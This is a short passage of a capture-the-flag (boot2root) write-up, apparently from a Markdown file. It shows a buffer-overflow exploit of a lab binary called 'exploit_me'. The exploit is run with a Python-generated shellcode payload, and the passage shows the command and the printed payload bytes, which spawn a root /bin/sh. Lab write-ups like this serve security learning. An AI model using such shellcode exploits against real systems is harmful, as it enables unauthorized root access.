hrhirha/boot2root/writeup1.md

 Now that we have all we need, we created shellcode.py to generate the payload for us.

+Once we ran the binary with our payload as argument we recieved a shell as the root user.
 ```
 $ ./exploit_me $(python shellcode.py)
 ���������������������������������������������������������������������������������������������������������������������1�Ph//shh/bin��PS���